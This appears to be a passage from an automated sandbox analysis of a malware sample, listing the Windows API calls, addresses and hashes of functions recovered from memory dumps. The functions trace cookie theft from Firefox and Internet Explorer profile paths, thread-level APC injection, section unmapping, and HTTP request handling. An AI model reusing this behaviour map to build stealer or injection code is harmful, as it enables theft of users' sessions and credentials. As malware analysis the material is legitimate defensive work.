    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
